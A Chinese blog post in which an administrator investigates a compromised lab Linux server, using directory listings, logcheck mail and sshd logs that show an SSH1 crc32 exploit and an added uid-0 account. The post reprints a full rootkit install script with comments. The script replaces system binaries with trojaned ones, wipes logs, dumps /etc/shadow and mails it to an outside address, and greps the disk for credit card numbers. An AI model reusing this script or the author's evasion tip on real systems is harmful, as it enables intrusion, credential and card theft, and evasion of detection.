分类: 网络与安全

2005-08-06 23:35:12


本来也不知道自己的机器有人进来了,因为放在内部,能经过NAT进来的几乎是
  不可能的,但无意登录机器随便看看,发现有个glibc的动态库不见了,立刻到
  /var/log/messages 那看看,什么都没有。FT,立刻启动备份机器,把硬盘拔出来,
  插到我的其他服务器上检查。唉,果然。。。
  
  [root@mail a]# la- la
  bash: la-: command not found
  [root@mail a]# ls -la
  total 704
  drwxr-xr-x 23 root root 4096 Feb 2 08:08 .
  drwxr-xr-x 7 root root 4096 Feb 5 18:15 ..
  drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount
  drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS
  drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin
  drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot
  drwxr-xr-x 2 root root 4096 Nov 23 22:04 command
  -rw------- 1 root root 241664 Jan 28 23:01 core
  就是这里溢出啦(根目录下留了个core),看来是FTP或者SSH的问题,内部实验机器,内部IP
  就懒得升级,结果。。。等下再gdb你好了。
  
  drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev
  -rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz
  真要命,rootkit的压缩包直接放在根目录,搞不懂是高手失误还是只会用别人的程序。
  drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc
  drwxr-xr-x 2 root root 4096 Nov 23 20:20 home
  drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib
  drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found
  drwxr-xr-x 2 root root 4096 Oct 31 1999 misc
  drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt
  drwxr-xr-t 3 root root 4096 Nov 23 22:03 package
  dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc
  drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk
  就是这个rootkit!看来很多人用这个呢
  drwxr-xr-x 6 root root 4096 Feb 2 23:46 root
  drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin
  看到 root 和 sbin 这2个目录没有,已经给改动过了,不可信任。
  
  drwxr-xr-x 2 root root 4096 Nov 23 21:40 service
  drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp
  drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr
  drwxr-xr-x 2 root root 4096 Nov 23 20:20 var
  [root@mail a]# date
  星期二 02 5 18:28:17 CST 2002
  
  
  
  [root@mail rk]# cat install
  #!/bin/sh
  unset HISTFILE
  STARTDIR=`pwd`
  CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log"
  这个程序的作者真不是人,连别人的信用卡都偷!
  
  SMP=`uname -a | grep smp | wc -l`
  还真没想过,入侵工具还要先判断目标是不是SMP内核呢(下面编译ADORE时用到)。
  clear
  echo "***** devhda1`s aka Mithra`s rootkit *****"
  echo "* greetz 2 bogonel and Amorph|s *"
  echo "* This is the RedHat 7.0 build *"
  echo "********************************************"
  sleep 2
  clear
  echo "Please wait while Setup is preparing your directory ... "
  sleep 5
  clear
  echo "Heh, sounds like f***in' Windoze, doesn't it ? :) "
  sleep 2
  clear
  DIR="/usr/lib/locale/ro_RO/uboot"
  mkdir -p $DIR
  mkdir -p $DIR/etc
  
  cp -f * $DIR/ >>/dev/null 少有的清空方式,这样就没办法追查INODE了。
  cd $DIR
  
  echo "Installing trojaned system files ..."
  
  echo "[*] Process tools ..."
  替换查看进程命令,FT
  echo " |---ps"
  chattr -aiu /bin/ps
  ./sz /bin/ps ps
  mv -f ps /bin/ps
  chattr +aiu /bin/ps
  echo " | \"
  echo " | |-- done replacing ps "
  
  sleep 1
  
  echo " |---pstree"
  chattr -aiu /usr/bin/pstree
  ./sz /usr/bin/pstree pstree
  mv -f pstree /usr/bin/pstree
  chattr +aiu /usr/bin/pstree
  echo " | \"
  echo " | |-- done replacing pstree "
  
  sleep 1
  
  echo " |---top"
  chattr -aiu /usr/bin/top
  ./sz /usr/bin/top top
  mv -f top /usr/bin/top
  chattr +aiu /usr/bin/top
  echo " | \"
  echo " | |-- done replacing top "
  echo " |----|"
  sleep 5
  
  echo "[*] Network tools ..."
  替换网络命令,FT,毒
  echo " |---netstat"
  chattr -aiu /bin/netstat
  ./sz /bin/netstat netstat
  mv -f netstat /bin/netstat
  chattr +aiu /bin/netstat
  echo " | \"
  echo " | |-- done replacing netstat "
  
  sleep 1
  
  echo " |---ifconfig"
  chattr -aiu /sbin/ifconfig
  ./sz /sbin/ifconfig ifconfig
  mv -f ifconfig /sbin/ifconfig
  chattr +aiu /sbin/ifconfig
  echo " | \"
  echo " | |-- done replacing ifconfig "
  
  #echo " |---inetd"
  贱啊,什么都换了
  
  #chattr -aiu /usr/sbin/inetd
  #./sz /usr/sbin/inetd inetd
  #mv -f inetd /usr/sbin/inetd
  #chattr +aiu /usr/sbin/inetd
  #echo " | \"
  #echo " | |-- done replacing inetd "
  
  sleep 1
  
  echo " |---tcpd"
  chattr -aiu /usr/sbin/tcpd
  ./sz /usr/sbin/tcpd tcpd
  mv -f tcpd /usr/sbin/tcpd
  chattr +aiu /usr/sbin/tcpd
  echo " | \"
  echo " | |-- done replacing tcpd "
  echo " |----|"
  sleep 1
  
  echo "[*] Filesystem tools ..."
  换了查找命令
  echo " |---find"
  chattr -aiu /usr/bin/find
  ./sz /usr/bin/find find
  mv -f find /usr/bin/find
  chattr +aiu /usr/bin/find
  echo " | \"
  echo " | |-- done replacing find "
  
  sleep 1
  
  echo " |---ls"
  chattr -aiu /bin/ls
  ./sz /bin/ls ls
  mv -f ls /bin/ls
  chattr +aiu /bin/ls
  echo " | \"
  echo " | |-- done replacing ls "
  echo " |----|"
  
  echo " |---dir"
  chattr -aiu /usr/bin/dir
  ./sz /usr/bin/dir dir
  mv -f dir /usr/bin/dir
  chattr +aiu /usr/bin/dir
  echo " | \"
  echo " | |-- done replacing dir "
  echo " |----|"
  
  sleep 1
  
  echo "[*] System tools ..."
  
  echo " |---syslogd"
  chattr -aiu /sbin/syslogd
  ./sz /sbin/syslogd syslogd
  mv -f syslogd /sbin/syslogd
  chattr +aiu /sbin/syslogd
  echo " | \"
  echo " | |-- done replacing syslog "
  echo " |----|"
  
  这里把 /var/log/messages 删掉再重建,不过写得不好:文件变小正好触发了后面 logcheck 的
  “smaller than last time checked”告警。不删除文件、只清内容会更隐蔽。
  rm -f /var/log/messages
  touch /var/log/messages
  /etc/rc.d/init.d/syslog restart
  sleep 1
  
  echo "[*] Placing configuration files in $DIR/etc/ ..."
  mv -f netstatrc $DIR/etc/netstatrc
  mv -f procrc $DIR/etc/procrc
  mv -f filerc $DIR/etc/filerc
  mv -f logrc $DIR/etc/logrc
  sleep 1
  
  开始编译外挂进程了,还好,不是LKM(不过从下面要有 /usr/src/linux 内核源码才能编译来看,ADORE 其实是内核模块,这点要当心)
  echo "[*] Trying to install ADORE ..."
  if [ -x /usr/bin/gcc ];
  then
  echo "GCC is present"
  if [ -d /usr/src/linux ];
  then
  if [ $SMP -eq 0 ];
  then
  echo "We have a machine without SMP support"
  cp -f Makefile.non-smp Makefile
  else
  echo "This machine supports SMP"
  cp -f Makefile.smp Makefile
  fi
  make
  mv -f ava /usr/bin/weather
  还改名成 weather 改头换面呢,呵呵~~
  rm -f *.c *.h Makefile*
  echo "ADORE is now installed ..."
  else
  echo "Kernel sources are not installed. Cannot install ADORE !"
  fi
  else
  echo "GCC is not installed. Cannot install ADORE !"
  fi
  
  echo "[*] Replacing /etc/rc.d/init.d/network with ours ..."
  mv -f network /etc/rc.d/init.d/network
  sleep 5
  mv -f twist2open /usr/bin/
  echo "[*] Starting services ..."
  #echo " |---backdoor ..."
  #echo " |---sniffer ..."
  加了后门还开SNIFFER,哼哼
  #echo " |---bnc ..."
  /usr/bin/twist2open &
  echo " | \"
  echo " | |-- done"
  echo " |----|"
  rm -f ./*pid* /*pid* /*log*
  sleep 5
  
  echo "[*] Gathering system info ..."
  echo " |---uname -a"
  uname -a >>file
  echo " |---ifconfig"
  /sbin/ifconfig >>file
  echo "|------" >>file
  echo " |---passwd file"
  cat /etc/passwd >>file
  echo " |---shadow file"
  echo "|------" >>file
  cat /etc/shadow >>file
  哇!!!!我的密码啊!!!!!!!
  echo " |---ping statistics"
  ping -c 5 216.115.108.245 >>file
  echo " | \"
  echo " | |-- done"
  echo "[*] Fixing vulns ..."
  echo " |---.bash_history"
  chattr +ia /root/.bash_history
  聪明!的确要佩服这个作者了
  echo " |---ftpd"
  chmod -s /var/ftp/*
  echo " |---rpc"
  chmod -s /usr/bin/rpc*
  chmod -s /usr/sbin/rpc*
  chmod -s /sbin/rpc*
  echo " |---named"
  chmod -s /var/named
  这里用 chmod -s 把这些服务程序的SUID位去掉了,堵住别人再从同样的路进来。幸亏我从来不用默认的服务的
  sleep 5
  echo " | \"
  echo " | |-- done"
  echo " |----|"
  echo "[*] Cleaning logs. This will take a while ..."
  开始清除LOG,进行收尾工作。
  ./logcleaner ftp >>/dev/null
  ./logcleaner rpc >>/dev/null
  ./logcleaner named >>/dev/null
  ./logcleaner yahoo >>/dev/null
  ./logcleaner bind >>/dev/null
  ./logcleaner geocities >>/dev/null
  ./logcleaner hypermart >>/dev/null
  ./logcleaner syslogd >>/dev/null
  sleep 1
  echo " | \"
  echo " | |-- done"
  echo " |----|"
  echo "[*] Mailing system information ..."
  mail -s "`uname -a`" ja_ja_j@yahoo.com   把所有资料都MAIL出去,毒(后面的退信显示这个邮箱并不存在,这封信没有送达)
  rm -f file
  cd $STARTDIR
  rm -rf ../*rh*
  echo "[*] Looking for cards ..."
  touch $CARDLOG
  egrep -ir 'mastercard|visa' /home|egrep -v cache >>$CARDLOG
  egrep -ir 'mastercard|visa' /var|egrep -v cache >>$CARDLOG
  egrep -ir 'mastercard|visa' /root|egrep -v cache >>$CARDLOG
  if [ -d /www ];
  then
  egrep -ir 'mastercard|visa' /www|egrep -v cache >>$CARDLOG
  fi
  这些代码就很有问题了,我在怀疑作者的人格了。
  echo "Rootkit successfully installed. Enjoy !"
  
  继续分析
  [root@mail log]# cat secure
  Jan 28 23:28:17 dnscache in.ftpd[2767]: connect from 192.168.100.26
  Jan 28 23:28:17 dnscache in.ftpd[2767]: error: cannot execute
  /usr/sbin/in.ftpd: No such file or directory
  Jan 30 04:44:05 dnscache in.telnetd[3891]: connect from 192.168.100.
  141
  Jan 30 17:41:17 dnscache in.telnetd[4199]: connect from 211.155.24.246
  Jan 31 00:52:23 dnscache login: FAILED LOGIN 1 FROM (null) FOR , User
  not known to the underlying authentication module
  Jan 31 19:13:57 dnscache in.telnetd[872]: connect from 192.168.100.141
  Feb 1 04:03:46 dnscache in.telnetd[1143]: connect from 192.168.100.25
  Feb 1 04:12:23 dnscache in.telnetd[1166]: connect from 192.168.100.25
  Feb 1 07:34:10 dnscache in.telnetd[1282]: connect from 211.155.24.246
  Feb 2 07:05:13 dnscache in.telnetd[1927]: connect from 218.17.238.238
  Feb 2 07:16:47 dnscache in.telnetd[1928]: connect from 218.17.238.238
  问题来了,上面这个 218.17.238.238 是ADSL用户的地址,而我的机器在内网
  ,怎么可能进来的?FT,要检讨内部安全问题了。
  
  看一下wtmp先:嗯。。。正常
  pts/0
  chair
  192.168.100.25
  pts/0
  pts/0
  chair
  192.168.100.25
  pts/0
  pts/0
  chair
  211.155.24.246
  pts/0
  runlevel
  tty1
  <#.
  tty2
  tty3
    tty4
  tty5
    tty6
  tty1
  X.<
  tty1
  chair
  f.<
  reboot
  runlevel
  tty1
  LOGIN
  
  看看FTP的记录先,最讨厌FTP进来的人,只有自己。。。删了记录?
  [root@mail log]# cat xferlog
  Fri Nov 23 21:17:31 2001 0 192.168.100.80 36975
  /home/chair/daemontools-0.76.tar.gz b _ i r chair ftp 0 *
  Fri Nov 23 21:17:32 2001 0 192.168.100.80 53019
  /home/chair/ucspi-tcp-0.88.tar.gz b _ i r chair ftp 0 *
  Fri Nov 23 21:17:34 2001 0 192.168.100.80 85648 /home/chair/djbdns-1.
  05.tar.gz b _ i r chair ftp 0 *
  Fri Nov 23 21:17:35 2001 0 192.168.100.80 28416
  /home/chair/qmailanalog-0.70.tar.gz b _ i r chair ftp 0 *
  
  [root@mail ssh-scan]#pwd
  /mnt/c/var/tmp/ssh-scan
  [root@mail ssh-scan]# ls -la
  total 32
  drwxr-xr-x 8 operator root 4096 Dec 2 08:22 .
  drwxrwxrwt 3 root root 4096 Feb 2 08:23 ..
  drwxr-xr-x 2 operator root 4096 Dec 2 08:07 bind
  drwxr-xr-x 2 operator root 4096 Dec 2 08:07 ftpd
  drwxr-xr-x 2 operator root 4096 Dec 2 08:07 lpd
  drwxr-xr-x 2 operator root 4096 Jun 16 2001 rpc
  drwxr-xr-x 2 operator root 4096 Jun 14 2001 src
  drwxr-xr-x 4 operator root 4096 Jan 21 19:57 ssh
  
  奇怪,这应该是用这些东西扫描时留下的文件,看来线索
  还是不少,或者这个进来的家伙太粗心了。
  
  [root@mail mail]# pwd
  /mnt/c/spool/mail
  
  [root@mail mail]#cat root |more
  太多了,垃圾日志省去大部分
  
  From root Sun Dec 2 05:01:00 2001
  Return-Path:
  Received: (from root@localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) id FAA23746
  for root; Sun, 2 Dec 2001 05:01:00 +0800
  Date: Sun, 2 Dec 2001 05:01:00 +0800
  From: root
  Message-Id: <200112012101.FAA23746@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  Subject: dnscache.i-168.com 12/02/01:05.01 system check
  
  
  Unusual System Events
  =-=-=-=-=-=-=-=-=-=-=
  *************** 问题大大的明显!!FT,我的错。
  *** WARNING ***: Log file /var/log/messages is smaller than last time
  checked!
  *************** This could indicate tampering.
  Dec 2 04:02:00 dnscache syslogd 1.3-3: restart.
  Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
  Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
  ***************
  *** WARNING ***: Log file /var/log/secure is smaller than last time
  checked!
  *************** This could indicate tampering.
  ***************
  *** WARNING ***: Log file /var/log/maillog is smaller than last time
  checked!
  *************** This could indicate tampering.
  
  
  From root Sun Dec 9 04:02:01 2001
  Return-Path:
  Received: (from root@localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) id EAA11188
  for root; Sun, 9 Dec 2001 04:02:01 +0800
  Date: Sun, 9 Dec 2001 04:02:01 +0800
  From: root
  Message-Id: <200112082002.EAA11188@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  Subject: errors rotating logs
  
  errors occured while rotating /var/log/httpd/access_log
  
  httpd: no process killed
  error running postrotate script
  
  
  Unusual System Events
  =-=-=-=-=-=-=-=-=-=-=
  ***************
  *** WARNING ***: Log file /var/log/messages is smaller than last time
  checked!
  *************** This could indicate tampering.
  Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
  Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
  Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
  ***************
  *** WARNING ***: Log file /var/log/secure is smaller than last time
  checked!
  
  From root Wed Jan 16 04:01:01 2002
  Return-Path:
  Received: (from root@localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) id EAA16976
  for root; Wed, 16 Jan 2002 04:01:01 +0800
  Date: Wed, 16 Jan 2002 04:01:01 +0800
  From: root
  Message-Id: <200201152001.EAA16976@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  Subject: dnscache.i-168.com 01/16/02:04.01 system check
  
  
  Unusual System Events
  =-=-=-=-=-=-=-=-=-=-=
  Jan 16 03:41:35 dnscache sshd[16485]: log: Connection from 200.184.184.
  51 port 3997
  Jan 16 03:41:36 dnscache sshd[16485]: fatal: Did not receive ident
  string. 扫描吧,哈哈~~
  
  From root Mon Jan 21 18:01:01 2002
  Return-Path:
  Received: (from root@localhost)
  by dnscache.i-168.com (8.9.3/8.9.3) id SAA19794
  for root; Mon, 21 Jan 2002 18:01:01 +0800
  Date: Mon, 21 Jan 2002 18:01:01 +0800
  From: root
  Message-Id: <200201211001.SAA19794@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  Subject: dnscache.i-168.com 01/21/02:18.01 ACTIVE SYSTEM ATTACK!
  
  HOHO~~~~原来是SSH的问题,我的SSH是那个什么破STARLINUX自带的,
  1.X吧,因为是实验机器,懒得升级,FT。问题来了
  Active System Attack Alerts
  =-=-=-=-=-=-=-=-=-=-=-=-=-=
  Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
  attack: network attack detected
  Security Violations
  =-=-=-=-=-=-=-=-=-=
  Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:50 dnscache sshd[18290]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:53 dnscache sshd[18293]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:57 dnscache sshd[18294]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:00 dnscache sshd[18297]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:35:47 dnscache sshd[18052]: log: Connection from 141.108.9.
  13 port 4639
  Jan 21 17:35:47 dnscache sshd[18053]: log: Connection from 141.108.9.
  13 port 4648
  Jan 21 17:35:49 dnscache sshd[18053]: fatal: Local: Your ssh version
  is too old and is no longer supported. Pl
  ease install a newer version.
  原来是这个家伙!但IP很古怪,是不是肉鸡??
  Jan 21 17:35:49 dnscache sshd[18056]: log: Connection from 141.108.9.
  13 port 4651
  Jan 21 17:36:36 dnscache sshd[18075]: log: Connection from 141.108.9.
  13 port 4674
  Jan 21 17:36:39 dnscache sshd[18078]: log: Connection from 141.108.9.
  13 port 4676
  Jan 21 17:36:42 dnscache sshd[18078]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:36:43 dnscache sshd[18079]: log: Connection from 141.108.9.
  13 port 4679
  Jan 21 17:36:46 dnscache sshd[18082]: log: Connection from 141.108.9.
  13 port 4682
  Jan 21 17:36:49 dnscache sshd[18082]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:36:50 dnscache sshd[18085]: log: Connection from 141.108.9.
  13 port 4685
  Jan 21 17:36:53 dnscache sshd[18085]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:36:53 dnscache sshd[18088]: log: Connection from 141.108.9.
  13 port 4687
  Jan 21 17:36:57 dnscache sshd[18089]: log: Connection from 141.108.9.
  13 port 4690
  Jan 21 17:37:00 dnscache sshd[18089]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:37:00 dnscache sshd[18092]: log: Connection from 141.108.9.
  13 port 4692
  Jan 21 17:37:04 dnscache sshd[18095]: log: Connection from 141.108.9.
  13 port 4694
  Jan 21 17:37:07 dnscache sshd[18095]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:37:08 dnscache sshd[18096]: log: Connection from 141.108.9.
  13 port 4697
  Jan 21 17:37:12 dnscache sshd[18099]: log: Connection from 141.108.9.
  13 port 4699
  Jan 21 17:37:24 dnscache sshd[18099]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:37:25 dnscache sshd[18106]: log: Connection from 141.108.9.
  13 port 4705
  Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
  13 port 4708
  Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
  13 port 4708
  Jan 21 17:37:31 dnscache sshd[18109]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:37:32 dnscache sshd[18110]: log: Connection from 141.108.9.
  13 port 4712
  Jan 21 17:37:36 dnscache sshd[18113]: log: Connection from 141.108.9.
  13 port 4713
  Jan 21 17:37:40 dnscache sshd[18116]: log: Connection from 141.108.9.
  13 port 4715
  Jan 21 17:37:43 dnscache sshd[18116]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:37:43 dnscache sshd[18119]: log: Connection from 141.108.9.
  13 port 4719
  Jan 21 17:37:47 dnscache sshd[18120]: log: Connection from 141.108.9.
  13 port 4720
  Jan 21 17:37:51 dnscache sshd[18123]: log: Connection from 141.108.9.
  13 port 1265Jan 21 17:41:12 dnscache sshd[18236]: log: Connection from
  141.108.9.13 port 2326
  Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:19 dnscache sshd[18241]: log: Connection from 141.108.9.
  13 port 2762
  Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:26 dnscache sshd[18244]: log: Connection from 141.108.9.
  13 port 4015
  Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:33 dnscache sshd[18247]: log: Connection from 141.108.9.
  13 port 4017
  Jan 21 17:41:40 dnscache sshd[18252]: log: Connection from 141.108.9.
  13 port 4019
  Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:41:52 dnscache sshd[18257]: log: Connection from 141.108.9.
  13 port 1049
  Jan 21 17:41:59 dnscache sshd[18262]: log: Connection from 141.108.9.
  13 port 1051
  Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:07 dnscache sshd[18265]: log: Connection from 141.108.9.
  13 port 1945
  Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:14 dnscache sshd[18270]: log: Connection from 141.108.9.
  13 port 3191
  Jan 21 17:42:23 dnscache sshd[18273]: log: Connection from 141.108.9.
  13 port 4027
  Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:26 dnscache sshd[18276]: log: Connection from 141.108.9.
  13 port 1110
  Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:30 dnscache sshd[18279]: log: Connection from 141.108.9.
  13 port 1557
  Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:33 dnscache sshd[18280]: log: Connection from 141.108.9.
  13 port 2124
  Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:36 dnscache sshd[18283]: log: Connection from 141.108.9.
  13 port 2630
  Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:40 dnscache sshd[18286]: log: Connection from 141.108.9.
  13 port 3184
  Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:43 dnscache sshd[18287]: log: Connection from 141.108.9.
  13 port 3915
  Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:42:47 dnscache sshd[18290]: log: Connection from 141.108.9.
  13 port 3918
  an 21 17:43:01 dnscache sshd[18300]: log: Connection from 141.108.9.13
  port 1033
  Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:04 dnscache sshd[18303]: log: Connection from 141.108.9.
  13 port 1034
  Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:08 dnscache sshd[18304]: log: Connection from 141.108.9.
  13 port 1036
  Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:11 dnscache sshd[18307]: log: Connection from 141.108.9.
  13 port 1586
  Jan 21 17:43:14 dnscache sshd[18307]: fatal: Local: Corrupted check
  bytes on input.
  Jan 21 17:43:15 dnscache sshd[18310]: log: Connection from 141.108.9.
  13 port 2150
  Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
  attack: network attack detected
  Jan 21 17:43:18 dnscache sshd[18311]: log: Connection from 141.108.9.
  13 port 2665
  Jan 21 17:43:22 dnscache sshd[18314]: log: Connection from 141.108.9.
  13 port 3162
  Jan 21 17:43:30 dnscache sshd[18319]: log: Connection from 141.108.9.
  13 port 4975
  Jan 21 17:43:34 dnscache sshd[18320]: log: Connection from 141.108.9.
  13 port 1512
  从开始连接到溢出只用了10来分钟,看来SSH1.X不能用了。
  Jan 21 17:45:48 dnscache sshd[18052]: fatal: Timeout before
  authentication.
  Jan 21 17:47:37 dnscache adduser[18423]: new user: name=cgi, uid=0,
  gid=0, home=/home/cgi, shell=/bin/bash
  加帐号了,5~~~~~
  Jan 21 17:47:52 dnscache PAM_pwdb[18426]: password for (cgi/0) changed
  by ((null)/0)
  Jan 21 17:48:00 dnscache PAM_pwdb[18433]: password for (operator/11)
  changed by ((null)/0)
  干吗改 operator 的密码呢?有问题——后面正是用 operator 账号通过密码登录进来的。
  Jan 21 17:48:18 dnscache sshd[18442]: log: Connection from 80.96.178.195
  port 1465
  Jan 21 17:48:20 dnscache sshd[18442]: log: Could not reverse map address
  80.96.178.195.
  Jan 21 17:48:28 dnscache sshd[18442]: log: Password authentication for
  operator accepted.
  Jan 21 17:49:12 dnscache sshd[18484]: log: Connection from 80.96.178.194
  port 2274
  Jan 21 17:49:12 dnscache sshd[18484]: log: Could not reverse map address
  80.96.178.194.
  Jan 21 17:49:20 dnscache sshd[18484]: log: Password authentication for
  operator accepted.
  情况很明显了,用了多个IP干活,能确定是肉鸡了,FT。
  Jan 21 17:50:30 dnscache sshd[18484]: fatal: Read error from remote
  host: Connection reset by peer
  Jan 21 17:51:08 dnscache sshd[18555]: log: Connection from 80.96.178.194
  port 2281
  Jan 21 17:51:08 dnscache sshd[18555]: log: Could not reverse map address
  80.96.178.194.
  Jan 21 17:51:19 dnscache sshd[18555]: log: Password authentication for
  operator accepted.
  Jan 21 17:58:11 dnscache sshd[18442]: fatal: Read error from remote
  host: Connection reset by peer
  by dnscache.i-168.com (8.9.3/8.9.3) id TAA23666
  for root; Mon, 21 Jan 2002 19:01:01 +0800
  Date: Mon, 21 Jan 2002 19:01:01 +0800
  From: root
  Message-Id: <200201211101.TAA23666@dnscache.i-168.com>
  To: root@dnscache.i-168.com
  Subject: dnscache.i-168.com 01/21/02:19.01 system check
  
  
  Unusual System Events
  =-=-=-=-=-=-=-=-=-=-=
